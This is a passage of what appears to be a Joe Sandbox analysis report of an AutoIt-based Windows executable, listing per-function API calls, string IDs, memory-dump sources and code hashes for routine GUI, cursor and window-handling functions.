                                                    • _memset.LIBCMT ref: 006D8C44
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006D8C8D
                                                    • _memset.LIBCMT ref: 006D8CEC
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006D8D16
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 006D8D6E
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 006D8E1B
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006D8E3D
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D8E87
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D8EB4
                                                    • DrawMenuBar.USER32(?), ref: 006D8EC3
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 006D8EEB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0$@U=u$hW
                                                    • API String ID: 1073566785-1221071083
                                                    • Opcode ID: aab5258733d077748abbaf4447c84554ed1fae5b3a0a252a85e231178edc69fb
                                                    • Instruction ID: 93d0f9ca51d1ef1288d59e0598bb45df2be8e81e0e03fb465b9c9e3e3c73b1c5
                                                    • Opcode Fuzzy Hash: aab5258733d077748abbaf4447c84554ed1fae5b3a0a252a85e231178edc69fb
                                                    • Instruction Fuzzy Hash: 70E15C70D01209AEDB209F55CC88AEE7BBAEF09750F14815BF915AB390DB709A81DF60
                                                    Function 006D488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 006D49CA
                                                    • GetDesktopWindow.USER32 ref: 006D49DF
                                                    • GetWindowRect.USER32(00000000), ref: 006D49E6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006D4A48
                                                    • DestroyWindow.USER32(?), ref: 006D4A74
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006D4A9D
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006D4ABB
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006D4AE1
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 006D4AF6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006D4B09
                                                    • IsWindowVisible.USER32(?), ref: 006D4B29
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006D4B44
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006D4B58
                                                    • GetWindowRect.USER32(?,?), ref: 006D4B70
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 006D4B96
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 006D4BB0
                                                    • CopyRect.USER32(?,?), ref: 006D4BC7
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 006D4C32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: 47fa11f4f23eb112144fff3fcf4a95182ccafdfd2fdeaad116583653c8160d9e
                                                    • Instruction ID: 5b9dd665c12c0b3be2ea177658d26ec631af6e8296487385318e61beec8c1e51
                                                    • Opcode Fuzzy Hash: 47fa11f4f23eb112144fff3fcf4a95182ccafdfd2fdeaad116583653c8160d9e
                                                    • Instruction Fuzzy Hash: 00B17B71A04340AFDB44DF65C844B6ABBE6BF88310F04891EF99A9B3A1DB71EC05CB55
                                                    Function 006B449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006B44AC
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006B44D2
                                                    • _wcscpy.LIBCMT ref: 006B4500
                                                    • _wcscmp.LIBCMT ref: 006B450B
                                                    • _wcscat.LIBCMT ref: 006B4521
                                                    • _wcsstr.LIBCMT ref: 006B452C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006B4548
                                                    • _wcscat.LIBCMT ref: 006B4591
                                                    • _wcscat.LIBCMT ref: 006B4598
                                                    • _wcsncpy.LIBCMT ref: 006B45C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: 041965f7b4e49d8402d1a723ba81ccafb5f0cce1b8e205d1fb1ceb9ae6e3cbdc
                                                    • Instruction ID: 32ba3776dddfb3dd76b69705817208b9736cfab5095151409450f5b0e92a03fe
                                                    • Opcode Fuzzy Hash: 041965f7b4e49d8402d1a723ba81ccafb5f0cce1b8e205d1fb1ceb9ae6e3cbdc
                                                    • Instruction Fuzzy Hash: AE41F772900211BBEB50AB749C07EFF77AEDF41710F04406EF909A6283EE359A4197A9
                                                    Function 006527D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006528BC
                                                    • GetSystemMetrics.USER32(00000007), ref: 006528C4
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006528EF
                                                    • GetSystemMetrics.USER32(00000008), ref: 006528F7
                                                    • GetSystemMetrics.USER32(00000004), ref: 0065291C
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00652939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00652949
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0065297C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00652990
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 006529AE
                                                    • GetStockObject.GDI32(00000011), ref: 006529CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 006529D5
                                                      • Part of subcall function 00652344: GetCursorPos.USER32(?), ref: 00652357
                                                      • Part of subcall function 00652344: ScreenToClient.USER32(007157B0,?), ref: 00652374
                                                      • Part of subcall function 00652344: GetAsyncKeyState.USER32(00000001), ref: 00652399
                                                      • Part of subcall function 00652344: GetAsyncKeyState.USER32(00000002), ref: 006523A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,00651256), ref: 006529FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: @U=u$AutoIt v3 GUI
                                                    • API String ID: 1458621304-2077007950
                                                    • Opcode ID: 0bbcbd1c7e6530c4caf2b51814710a5a2f7c74a2ad76466ac6dd5c3ff7b3d9af
                                                    • Instruction ID: 748a17b70acfef09442781a37ce579a7ef60d90afef93e5502be19273eb21856
                                                    • Opcode Fuzzy Hash: 0bbcbd1c7e6530c4caf2b51814710a5a2f7c74a2ad76466ac6dd5c3ff7b3d9af
                                                    • Instruction Fuzzy Hash: 8EB16D71A0020ADFDB14DFA8DC95BED7BA6FB48311F108229FA16A62D0DB749845CB54
                                                    Function 006DC5FE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 181windowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 006DC627
                                                      • Part of subcall function 006DAB37: ClientToScreen.USER32(?,?), ref: 006DAB60
                                                      • Part of subcall function 006DAB37: GetWindowRect.USER32(?,?), ref: 006DABD6
                                                      • Part of subcall function 006DAB37: PtInRect.USER32(?,?,006DC014), ref: 006DABE6
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006DC690
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006DC69B
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006DC6BE
                                                    • _wcscat.LIBCMT ref: 006DC6EE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006DC705
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006DC71E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 006DC735
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 006DC757
                                                    • DragFinish.SHELL32(?), ref: 006DC75E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006DC851
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u$hW$pbq
                                                    • API String ID: 169749273-3829141871
                                                    • Opcode ID: 6c4dc77ed51f08b76ebc5e33b376a65e790493341c894562ed99ab2e1133901d
                                                    • Instruction ID: e52b54a388dba7f45684003594c044b2a38f0d60f6604614134a32c4b03fe9e7
                                                    • Opcode Fuzzy Hash: 6c4dc77ed51f08b76ebc5e33b376a65e790493341c894562ed99ab2e1133901d
                                                    • Instruction Fuzzy Hash: B1619F71508345AFC701DF64CC85D9FBBFAEF89310F004A2EF592962A1DB309A49CB56
                                                    Function 006DA1B9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 205windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006DA259
                                                    • DestroyWindow.USER32(?,?), ref: 006DA2D3
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006DA34D
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006DA36F
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006DA382
                                                    • DestroyWindow.USER32(00000000), ref: 006DA3A4
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00650000,00000000), ref: 006DA3DB
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006DA3F4
                                                    • GetDesktopWindow.USER32 ref: 006DA40D
                                                    • GetWindowRect.USER32(00000000), ref: 006DA414
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006DA42C
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006DA444
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$@U=u$hW$tooltips_class32
                                                    • API String ID: 1297703922-2843442765
                                                    • Opcode ID: c72d1693cb9475a25c619468c42064dfe85ced7554b951154d388e78b3a0affd
                                                    • Instruction ID: 9bee4221da651b106561a5d43a1a0afaaea351f5769ca9406fc8c298d70e6c0c
                                                    • Opcode Fuzzy Hash: c72d1693cb9475a25c619468c42064dfe85ced7554b951154d388e78b3a0affd
                                                    • Instruction Fuzzy Hash: FA71BE70944245AFD725CF68CC49FA677E6FB89300F04852EF985873A0CBB4E906CB56
                                                    Function 006DBA33 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 130filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 006DBA56
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 006DBA6D
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 006DBA78
                                                    • CloseHandle.KERNEL32(00000000), ref: 006DBA85
                                                    • GlobalLock.KERNEL32(00000000), ref: 006DBA8E
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006DBA9D
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 006DBAA6
                                                    • CloseHandle.KERNEL32(00000000), ref: 006DBAAD
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 006DBABE
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,006E2CAC,?), ref: 006DBAD7
                                                    • GlobalFree.KERNEL32(00000000), ref: 006DBAE7
                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 006DBB0B
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 006DBB36
                                                    • DeleteObject.GDI32(00000000), ref: 006DBB5E
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006DBB74
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID: @U=u
                                                    • API String ID: 3840717409-2594219639
                                                    • Opcode ID: 0e05b78af06530649f2505e644bd03cf88dcfdf6225ba0b332a8c59dfb8fd447
                                                    • Instruction ID: 9b434e0fdbda5b683fdcca5f6b952fd994b21bd19a52574bce475e9505d6ba64
                                                    • Opcode Fuzzy Hash: 0e05b78af06530649f2505e644bd03cf88dcfdf6225ba0b332a8c59dfb8fd447
                                                    • Instruction Fuzzy Hash: 88413C75901204EFDB119FA5DC48EAA7BBAFF89711F15506AF906D7360DB309E01CB60
                                                    Function 006AA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 006AA47A
                                                    • __swprintf.LIBCMT ref: 006AA51B
                                                    • _wcscmp.LIBCMT ref: 006AA52E
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006AA583
                                                    • _wcscmp.LIBCMT ref: 006AA5BF
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 006AA5F6
                                                    • GetDlgCtrlID.USER32(?), ref: 006AA648
                                                    • GetWindowRect.USER32(?,?), ref: 006AA67E
                                                    • GetParent.USER32(?), ref: 006AA69C
                                                    • ScreenToClient.USER32(00000000), ref: 006AA6A3
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 006AA71D
                                                    • _wcscmp.LIBCMT ref: 006AA731
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 006AA757
                                                    • _wcscmp.LIBCMT ref: 006AA76B
                                                      • Part of subcall function 0067362C: _iswctype.LIBCMT ref: 00673634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: 9dd8f978171d99823c891151835e2424c1f58ff4004a58d428142ff5fb7d978d
                                                    • Instruction ID: f8d392ce07bc1e4f5e9165d800349ad04241185e046b337b2fd8cd69eae81290
                                                    • Opcode Fuzzy Hash: 9dd8f978171d99823c891151835e2424c1f58ff4004a58d428142ff5fb7d978d
                                                    • Instruction Fuzzy Hash: 32A1B371604606AFD715EFA0C884BEAB7EAFF45314F00852AF999C2290DB30ED55CF92
                                                    Function 006AAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 006AAF18
                                                    • _wcscmp.LIBCMT ref: 006AAF29
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 006AAF51
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 006AAF6E
                                                    • _wcscmp.LIBCMT ref: 006AAF8C
                                                    • _wcsstr.LIBCMT ref: 006AAF9D
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006AAFD5
                                                    • _wcscmp.LIBCMT ref: 006AAFE5
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 006AB00C
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006AB055
                                                    • _wcscmp.LIBCMT ref: 006AB065
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 006AB08D
                                                    • GetWindowRect.USER32(00000004,?), ref: 006AB0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: a63668c24b3a17bce259f7656e609281478a6d40173af470ed7e29d27bbfcf18
                                                    • Instruction ID: 940a5c68bc838d634e51604f12b5af45f0354c9435b8d56854fe55206d93e7ca
                                                    • Opcode Fuzzy Hash: a63668c24b3a17bce259f7656e609281478a6d40173af470ed7e29d27bbfcf18
                                                    • Instruction Fuzzy Hash: 9981A1711082059FDB04EF10C885FAA77EAEF45314F04956EFD858A292DB34DD49CFA1
                                                    Function 006AABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: d9eb650cab42b6eec8529b4ff6253cdba127f203c782fc9c03220e5a1e749c03
                                                    • Instruction ID: 8dccc77ed819761efe185849e62079105cd0edd423ad07b19a37a85cd9da5c51
                                                    • Opcode Fuzzy Hash: d9eb650cab42b6eec8529b4ff6253cdba127f203c782fc9c03220e5a1e749c03
                                                    • Instruction Fuzzy Hash: ED31E5B0A48205EBDA58FA94DD03EEE73A6AF11721F20421EF803711D1EF556F08CA5A
                                                    Function 006C4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 006C5013
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 006C501E
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 006C5029
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 006C5034
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 006C503F
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 006C504A
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 006C5055
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 006C5060
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 006C506B
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 006C5076
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 006C5081
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 006C508C
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 006C5097
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 006C50A2
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 006C50AD
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 006C50B8
                                                    • GetCursorInfo.USER32(?), ref: 006C50C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$Info
                                                    • String ID:
                                                    • API String ID: 2577412497-0
                                                    • Opcode ID: ffe477f507a518c03af2d7bb42d2218b96599dd3df96ac526b6357f46b7e3177
                                                    • Instruction ID: 653492589fa5d2892231c0d2ae046cf050fcd31c7cff3f068b5a5bdfd0712365
                                                    • Opcode Fuzzy Hash: ffe477f507a518c03af2d7bb42d2218b96599dd3df96ac526b6357f46b7e3177
                                                    • Instruction Fuzzy Hash: AA3117B1E083196ADF109FB68C89DAFBFE9FF04750F50452AA50DE7280DA78A540CF95
                                                    Function 006D4392 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 006D4424
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006D446F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
